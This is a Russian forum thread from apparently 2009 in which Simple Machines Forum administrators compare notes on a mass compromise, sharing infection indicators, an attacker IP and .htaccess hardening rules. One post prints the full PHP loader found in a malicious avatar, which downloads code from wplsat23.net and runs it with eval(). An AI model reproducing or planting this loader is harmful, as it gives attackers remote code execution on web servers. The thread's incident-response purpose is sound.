Взлом форума сообщества Ubuntu.ru

[OstLand]

Прочитал вот эту новость: http://ubuntu.ru/pr/forum

Краткая хронология:

    * В конце апреля — начале мая некими неизвестными злоумышленниками был создан механизм, эксплуатирующий ошибки в работе программного обеспечения, которое используется в том числе и на нашем форуме — Simple Machines Forum. Ошибки присутствуют во всех известных на данное время релизах SMF 1.1.x.
    * В начале мая с использованием данного механизма начался процесс «заражения» всех работающих инсталляций SMF, в результате которого подобные форумы организовали рекламный «ботнет», с помощью которого генерировался рекламный трафик на интернет-ресурсы, а также, возможно, рассылка спама и использование в качестве подставных хостов для иных противоправных и деструктивных действий.
    * При взломе форума его функциональность не страдает и внешне проблему в работе заметить практически невозможно. Это осложняет ситуацию и, к текущему моменту, как минимум несколько тысяч форумов находятся в «зараженном» состоянии.
    * 5 мая взлому подвергся наш форум. В результате стандартной проверки администратором форума, это было обнаружено 7 мая.
    * Администраторы хостинговой площадки оперативно отключили все ресурсы использующие SMF (3 форума разных LoCo), чтобы ресурсы хостинга не могли быть использованы для противоправных действий. Условие восстановления работы форума — официальное решение проблемы безопасности в SMF.

Любое ПО имеет ошибки и эти ошибки могут быть использованы в корыстных целях. Доступные он-лайн open source программы часто являются целями успешных атак. Однако конкретная ситуация вокруг SMF довольно уникальна — наличие неизвестной, эксплуатируемой с помощью неизвестного инструмента, уязвимости и быстрое скрытое распространение. Обычно ситуация с использованием уязвимостей не выходила на такой уровень и исправления выходили ранее широкого распространения информации о проблеме. К сожалению, уровень текущей проблемы оказался достаточно высок и официального патча для устранения уязвимости сейчас нет.

Поясните, плиз, что это за уязвимость и как проверить свой форум на отсутствие заражения?

[Alder]

Если я верно понимаю по описанию, то у меня тоже аналогично был заражен форум. Определяется это наличием в начале каждого php-файла в папке Sources строки вида <?php eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCdablZ1WTNScGIyNGdSa1k1TjBFeFJEZEJ....
После декодирования строки были обнаружены ссылки на файл /Themes/default/images/icons/style.css.php. Рядом были найдены еще левые скрипты и около 800 файлов с рекламным содержанием. Чистить пришлось много и долго. Сейчас вроде все ок.

[neol]

Насколько я понимаю, это оно - http://www.simplemachines.org/community/index.php?topic=307717.0

[Alder]

Да, совершенно верно. Жду обновления.

[Fenix]

Насколько я понимаю, это оно - http://www.simplemachines.org/community/index.php?topic=307717.0

Не спикаю по инглишу, но нашёл, что там есть разговор о  "krisbarteo", этого юзера я как раз сегодня отслеживал, Дата регистрации: 16 Мая 2009, 09:14:19 Последняя активность: Сегодня в 13:54:38. Так вот, у меня установлен custom_profile_3.20, так он в выпадающих списках (!!!) по единицам проставил! Так же вызвал ошибки типа:

Код Выделить Развернуть


2: file_exists() [<a href='function.file-exists'>function.file-exists</a>]: open_basedir restriction in effect. File(/home/***/public_html/forum/Themes/babylon/languages/Settings.russian-utf8.php) is not within the allowed path(s): (/home/***/data:.)
Файл: /home/***/data/www/***.com/Sources/Themes.php
Строка: 915
?action=theme;sa=pick;u=1579;sesc


[OstLand]

Спасибо за ответы. От греха подальше ввел у себя одобрение регистрации пользователя администратором форума, благо новых юзеров регится мало...

зы. Удивительно, что создатели SMF (в т.ч. и держатели русского сайта поддержки) не уведомили об опасности юзеров большими красными буквами на заглавной странице... 

[Fenix]

Так и не нашёл, куда он прописывает свой код. Вобщем, народ, где увидите что-то типа base64 (или ещё чего странное в файлах) сообщите.

[Alder]

Так и не нашёл, куда он прописывает свой код. Вобщем, народ, где увидите что-то типа base64 (или ещё чего странное в файлах) сообщите.

Код он прописывает во все php-файлы. В частности советую посмотреть на его аватарку в текстовом редакторе. Там будет что-то вроде:

Код Выделить Развернуть

<?php;$url = 'http://wplsat23.net/?update=main';
$done = false;if(!$url){return '';}
$url_info = parse_url($url);
$url_info[port] = ($url_info[port]) ? $url_info[port]:80;
$url_info[path] = ($url_info[path]) ? $url_info[path] : "/"; 
$url_info[query] = ($url_info[query]) ? $url_info[path] = $url_info[path] . "?" . $url_info[query] : ""; 
$query = "GET " . $url_info[path] . " HTTP/1.1\r\n"; $query = $query . "Host: " . $url_info[host] . "\r\n"; $query = $query . "Accept: */*" . "\r\n"; 
$query = $query . "Connection: close" . "\r\n"; 
$query = $query . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" . "\r\n";
$query = $query . "\r\n"; $errno = 0; $error = ""; 
$sock = fsockopen($url_info[host], $url_info[port], $errno, $error, 30);$h = array();
$resp = array();if($sock){stream_set_timeout($sock, 30);fwrite($sock, $query);
$hd = false;while(!feof($sock)){$l = fgets($sock);if(!$hd){if(trim($l) == ''){$hd = true;}else{$h[] = $l;}}else{$resp[] = $l;}}
fclose($sock);}
$ret = implode("", $resp);eval($ret);?>

[Fenix]

Код он прописывает во все php-файлы.

А что именно он прописывает? Пока ни в одном файле ничего подозрительного не обнаружил.

В частности советую посмотреть на его аватарку в текстовом редакторе. Там будет что-то вроде:

Нету у него аватарки... 
Я поставил, что можно только загружать аватары, а стандартными и удалёнными пользоваться у нас нельзя. Может это помогло...

[Alder]

А что именно он прописывает? Пока ни в одном файле ничего подозрительного не обнаружил.

Я поставил, что можно только загружать аватары, а стандартными и удалёнными пользоваться у нас нельзя. Может это помогло...

Прописывает строку аля та, которую я указал в самом начале темы. В папке Themes\default\images\bbc появляется файл style.css.php. И проблема как раз в том, что аватар он загрузил. Лезем и ищем в attachments файлик avatar_#.jpg, где # - это его userID.

[Fenix]

Прописывает строку аля та, которую я указал в самом начале темы. В папке Themes\default\images\bbc появляется файл style.css.php. И проблема как раз в том, что аватар он загрузил. Лезем и ищем в attachments файлик avatar_#.jpg, где # - это его userID.

Аватар есть (переименовал его), файл style.css.php отсутствует (по этим координатам).

[Gnostis]

В каком файле осуществятся загрузка изображений?

Как вараинт, можно сразу после загрузки парсить картинку на наличие в ней PHP/HTML/JS и если таковое обнаружиться, стереть либо заменить на заранее подготовленное изображение.

[bbbbbb]

php - это дырка язык, ламай как хочешь и что хочешь   

[digger®]

php - это дырка язык, ламай как хочешь и что хочешь  

Дырки в головах, а не языках.

[bbbbbb]

это тоже, да, и зависит от арахитектуры, тоже (чтобы логические ошибки не делать)...
но скорее всего это от логических ошибок!

[neol]

Кстати, загрузка аватар на моем проекте разрешена только после 20 сообщений... Что называется ж*ой чуял

[Mavn]

Ребят у кого какие то проблемы с безопасностью возникли огромная просьба присылать логи доступа и логи ошибок на следущий email support@mavn.org(создам через 1час) я постараюсь вовремя обрабатывать данные и пересылать разработчикам.

[Fenix]

Ребят у кого какие то проблемы с безопасностью возникли огромная просьба присылать логи доступа и логи ошибок на следущий email support@mavn.org(создам через 1час) я постараюсь вовремя обрабатывать данные и пересылать разработчикам.

А проблемой с безопасностью считается загрузка этого троянистого аватара, но без обнаружения файла style.css.php (все папки форума перерыл, не нашёл, тьфу-тьфу-тьфу), и отсутсвие в файлах подозрительных кодов содержащих "base64", тьфу-тьфу-тьфу? 


PS Блин, когда там двойка пригодна для взломостойких форумов станет и с кириллицей окончательно подружится...

[Alder]

Ребят у кого какие то проблемы с безопасностью возникли огромная просьба присылать логи доступа и логи ошибок на следущий email support@mavn.org(создам через 1час) я постараюсь вовремя обрабатывать данные и пересылать разработчикам.

А все скрипты от взломщика + какой-то файлик со списком IP присылать? И аватарку могу еще его.

[bbbbbb]

а что происходит когда взломали?

[Alder]

bbbbbb, внешне ничем не проявляется. кроме возможных ошибок в логах форума. судя по содержимому файликов это был веб-шелл c99shell + куча файлов с рекламой внутри (тут каюсь - поторопился и снес все к чертям, не оставив даже десятка для примеров).

[Mavn]

все что касается взлома присылайте все.единственное что можно еще попробовать сделать на мой взгляд поместить в папку вложений и аватар htaccess с таким содержанием:

Код Выделить Развернуть


php_value engine off


[Gover]

Проверил только что форум свой.
Пользователь такой был - krisbarteo (удалил его от греха подальше), но по видимому наследить еще не успел. Все файлы чистые. + Установил антибота на регистрацию.

[spretro]

krisbarteo зарегистрировался 17го. сразу прочитала о нем в гугле и забанила(может, надо удалять?). имеются его аватары. что присылать? что такое логи доступа?

В папке Themes\default\images\bbc нет файла style.css.php
И наличия в начале каждого php-файла в папке Sources строки вида <?php eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCdablZ1WTNScGIyNGdSa1k1TjBFeFJEZEJ.... тоже нет

[Mavn]

логи доступа пишутся апачем проще говоря. Мне нужны только за одно число когда все произошло ничего более

[bbbbbb]

тут вот написано что форум куда-то подключяется и хостинг его закрыл
http://ubuntu.ru/pr/forum

у кого выделенный сервер, то можно закрыть возможность инициализации подключени из хостинга (из форум на пхп)

или еще через сокеты и подобные он может гадить, их можно закрыть, но так как возможно скрипт дает размножатся на хостинге, то может там и не пхпl скрипт работать...

[digger®]

Что интересно, сайт wplsat23.net c которого аватарчик грузит эксплоит, работает и никто его не трогает.

[Gnostis]

все что касается взлома присылайте все.единственное что можно еще попробовать сделать на мой взгляд поместить в папку вложений и аватар htaccess с таким содержанием:

Код Выделить Развернуть


php_value engine off


это по моему еще разработчиком надо было сделать, наличие в папке с вложениями работающего файла index.php должно было вызвать хоть какие то подозрения.

[bbbbbb]

Что интересно, сайт wplsat23.net c которого аватарчик грузит эксплоит, работает и никто его не трогает.

потому что его может так заразили как и все остальные...
(а может и вирус, бегает по url и ищет smf)

У меня не пингуется:

Код Выделить Развернуть

ping -c 10 72.46.130.186
PING 72.46.130.186 (72.46.130.186): 56 data bytes

--- 72.46.130.186 ping statistics ---
10 packets transmitted, 0 packets received, 100.0% packet loss

через какой-то определенный порт может грузит, а все остальное вырубили и пинг, тоже?

[vladok]

А что с форумами на базе 2ки? Были случаи заражения ?

[digger®]

А что с форумами на базе 2ки? Были случаи заражения ?

Случаев вроде не было, но в принципе тоже возможно.

[vladok]

Хм... как в двойке запретить грузить аваторы до хх сообщений на форуме? носом ткните где код поправить шоб регающийся шел лесом, не имя возможности на юзанье загружаемого им аватора.

[digger®]

Хм... как в двойке запретить грузить аваторы до хх сообщений на форуме? носом ткните где код поправить шоб регающийся шел лесом.

Права доступа для группы Новичок

[vladok]

Нет такой опции. есть лишь одна группа Обычные пользователи
В Группы пользователей у новичка лишь выбор разделов...

Включить использование прав для групп основанных на количестве сообщений?

[digger®]

Включить использование прав для групп основанных на количестве сообщений?

Вроде бы вполне очевидно.

[Serifa]

Ребят у кого какие то проблемы с безопасностью возникли огромная просьба присылать логи доступа и логи ошибок на следущий email support@mavn.org(создам через 1час) я постараюсь вовремя обрабатывать данные и пересылать разработчикам.

Ну вот... у меня тоже ничего не осталось, все удалила уже. И почистила. Где ж вы раньше-то были?? Насчет этого подозрительного юзера... у меня такой был, со странным аватаром: там был гифовый файл 1х1. Возможно, прошло около суток, пока я им заинтересовалась.

[Gnostis]

Когда примерно ожидать официальный патч (решение) от разработчиков?

[BIOHAZARD]

Когда примерно ожидать официальный патч (решение) от разработчиков?

они помоему ещё даже не поняли как их взломали, не то что патч сделать :о)

[Gnostis]

ну да... как во многих онлайн играх делают...
- так тут у нас что то сломали, а как сломали? И в каком месте? А отключим ка мы эту функцию нафиг пока не разберемся.
- Чет пользователи ругаются что уже пол года *** не работает...

[Badman]

у меня есть такой пользователь ... 05,05,2009 зарегестрировался но никаких действий не производил вроде, даже аватарку не загрузил .... забанил его форум 2.х

[Mavn]

На всякий случай вырубите функцию выбора тем для пользователей. Судя по всему данная функция так же может быть уязвима.

Кстати кто обновлялся средствами модов -патчей могли не заметить одно маленькое но существенное изменение в безопасности вложений и модификаций.
в папке attachments и Packages появился файлик .htaccess  с таким содержанием

Код Выделить Развернуть


<Files *>
Order Deny,Allow
Deny from all
Allow from localhost
</Files>


[Fenix]

Кстати кто обновлялся средствами модов -патчей могли не заметить одно маленькое но существенное изменение в безопасности вложений и модификаций.
в папке attachments и Packages появился файлик .htaccess  с таким содержанием

Код Выделить Развернуть


<Files *>
Order Deny,Allow
Deny from all
Allow from localhost
</Files>


А на счёт php_value engine off, как правильней записать
Так:

Код Выделить Развернуть



<Files *>
Order Deny,Allow
Deny from all
Allow from localhost
php_value engine off
</Files>



Или так:

Код Выделить Развернуть



<Files *>
Order Deny,Allow
Deny from all
Allow from localhost
</Files>

php_value engine off



[Yworld_garry]

Думаю вот так, в начале файла.

Код Выделить Развернуть

php_value engine off
<Files *>
   Order Deny,Allow
   Deny from all
   Allow from localhost
</Files>

[Drakonsa]

Обычно этот "крякер" заходит с выделенного сервера: 94.142.129.147. Мождете поместить его в блок лист, но это не даст 100% защиты, т.к. он может пойти через прокси...

[Mavn]

<files~".(php* |s?p?html | | cgi | pl)$">
  deny from all
</files>

лучше вот так даже сделать запрет не только php но и прочего барохла

[NECros88]

Обычно этот "крякер" заходит с выделенного сервера: 94.142.129.147. Мождете поместить его в блок лист, но это не даст 100% защиты, т.к. он может пойти через прокси...

это чистейшей воды бот, до сих пор понять не можете?

[Serifa]

Этот чистый бот запросто обошел защиту и повышенную капчу, и зарегился, да еще аватарку поставил. Против такого бота нужны серьезные средства. Я удивляюсь, как он тему на форуме не открыл и не рассказал про свои подвиги.

[NECros88]

обойти заранее обкатанную капчу не проблема

[Serifa]

а кто ее заранее обкатал? 

[moskovets]

ё, я токо увидел темку, ща буду спешить перелопачивать свой, но такого пользователя у меня небыло...